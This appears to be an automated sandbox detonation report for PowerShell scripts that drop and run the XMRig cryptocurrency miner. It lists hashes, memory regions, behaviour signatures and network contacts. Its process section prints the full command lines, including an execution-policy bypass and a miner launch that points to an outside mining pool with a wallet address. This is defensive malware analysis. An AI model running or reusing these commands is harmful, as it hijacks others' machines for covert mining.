memory/748-0-0x00007FF983743000-0x00007FF983744000-memory.dmp
memory/748-5-0x00000279DC890000-0x00000279DC8B2000-memory.dmp
memory/748-6-0x00007FF983740000-0x00007FF98412C000-memory.dmp
memory/748-9-0x00007FF983740000-0x00007FF98412C000-memory.dmp
memory/748-10-0x00000279DCA40000-0x00000279DCAB6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m4yxep5v.4qu.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/748-25-0x00007FF983740000-0x00007FF98412C000-memory.dmp
memory/748-48-0x00000279DCBE0000-0x00000279DCBF2000-memory.dmp
memory/748-61-0x00000279DCA20000-0x00000279DCA2A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4464-90-0x0000020C09D30000-0x0000020C09D50000-memory.dmp
memory/4464-91-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/748-92-0x00007FF983743000-0x00007FF983744000-memory.dmp
memory/748-93-0x00007FF983740000-0x00007FF98412C000-memory.dmp
memory/4464-94-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/748-95-0x00007FF983740000-0x00007FF98412C000-memory.dmp
memory/4464-96-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-97-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-98-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-99-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-100-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-101-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-102-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-103-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-104-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-105-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-106-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-107-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-108-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-109-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-110-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-111-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-112-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-113-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-114-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-115-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-116-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-117-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-118-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-119-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-120-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-121-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-122-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-123-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-124-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-125-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-126-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-127-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-128-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-129-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-130-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-131-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-132-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-133-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-134-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-135-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-136-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-137-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-138-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-139-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-140-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-141-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-142-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-143-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-144-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-145-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-146-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-147-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-148-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-149-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-150-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-151-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-152-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-153-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-154-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-155-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-156-0x00007FF741210000-0x00007FF741E43000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:27
Platform
win10v2004-20240426-en
Max time kernel
1794s
Max time network
1757s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3052 wrote to memory of 4992 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3052 wrote to memory of 4992 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.112.168.52.in-addr.arpa | udp |
Files
memory/3052-0-0x00007FFFE3423000-0x00007FFFE3425000-memory.dmp
memory/3052-6-0x0000018AF62D0000-0x0000018AF62F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qdbcmn1d.gyi.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3052-11-0x00007FFFE3420000-0x00007FFFE3EE1000-memory.dmp
memory/3052-12-0x00007FFFE3420000-0x00007FFFE3EE1000-memory.dmp
memory/3052-14-0x00007FFFE3420000-0x00007FFFE3EE1000-memory.dmp
memory/3052-15-0x0000018AF62A0000-0x0000018AF62B2000-memory.dmp
memory/3052-16-0x0000018AF3850000-0x0000018AF385A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4992-47-0x0000027E80F90000-0x0000027E80FB0000-memory.dmp
memory/4992-48-0x0000027E811E0000-0x0000027E81200000-memory.dmp
memory/3052-49-0x00007FFFE3420000-0x00007FFFE3EE1000-memory.dmp
memory/3052-51-0x00007FFFE3423000-0x00007FFFE3425000-memory.dmp
memory/4992-50-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/3052-52-0x00007FFFE3420000-0x00007FFFE3EE1000-memory.dmp
memory/4992-54-0x0000027E829C0000-0x0000027E829E0000-memory.dmp
memory/4992-55-0x0000027E829E0000-0x0000027E82A00000-memory.dmp
memory/4992-53-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/3052-56-0x00007FFFE3420000-0x00007FFFE3EE1000-memory.dmp
memory/4992-57-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-58-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-59-0x0000027E829C0000-0x0000027E829E0000-memory.dmp
memory/4992-60-0x0000027E829E0000-0x0000027E82A00000-memory.dmp
memory/4992-61-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-62-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-63-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-64-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-65-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-66-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-67-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-68-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-69-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-70-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-71-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-72-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-73-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-74-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-75-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-76-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-77-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-78-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-79-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-80-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-81-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-82-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-83-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-84-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-85-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-86-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-87-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-88-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-89-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-90-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-91-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-92-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-93-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-94-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-95-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-96-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-97-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-98-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-99-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-100-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-101-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-102-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-103-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-104-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-105-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-106-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-107-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-108-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-109-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-110-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-111-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-112-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-113-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-114-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-115-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-116-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-117-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-118-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-119-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:55
Platform
win10v2004-20240426-en
Max time kernel
1792s
Max time network
1764s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4104 wrote to memory of 4504 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4104 wrote to memory of 4504 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.65.42.20.in-addr.arpa | udp |
Files
memory/4104-0-0x00007FFA6A4B3000-0x00007FFA6A4B5000-memory.dmp
memory/4104-6-0x000001D5FD200000-0x000001D5FD222000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0gftsm53.sqc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4104-11-0x00007FFA6A4B0000-0x00007FFA6AF71000-memory.dmp
memory/4104-12-0x00007FFA6A4B0000-0x00007FFA6AF71000-memory.dmp
memory/4104-14-0x00007FFA6A4B0000-0x00007FFA6AF71000-memory.dmp
memory/4104-15-0x000001D5FE0D0000-0x000001D5FE0E2000-memory.dmp
memory/4104-16-0x000001D5FDF70000-0x000001D5FDF7A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4504-47-0x000001C13AD90000-0x000001C13ADB0000-memory.dmp
memory/4504-48-0x000001C13ADD0000-0x000001C13ADF0000-memory.dmp
memory/4504-49-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-50-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-52-0x000001C13ADF0000-0x000001C13AE10000-memory.dmp
memory/4104-51-0x00007FFA6A4B3000-0x00007FFA6A4B5000-memory.dmp
memory/4104-53-0x00007FFA6A4B0000-0x00007FFA6AF71000-memory.dmp
memory/4504-54-0x000001C13AE10000-0x000001C13AE30000-memory.dmp
memory/4504-55-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-56-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-57-0x000001C13ADF0000-0x000001C13AE10000-memory.dmp
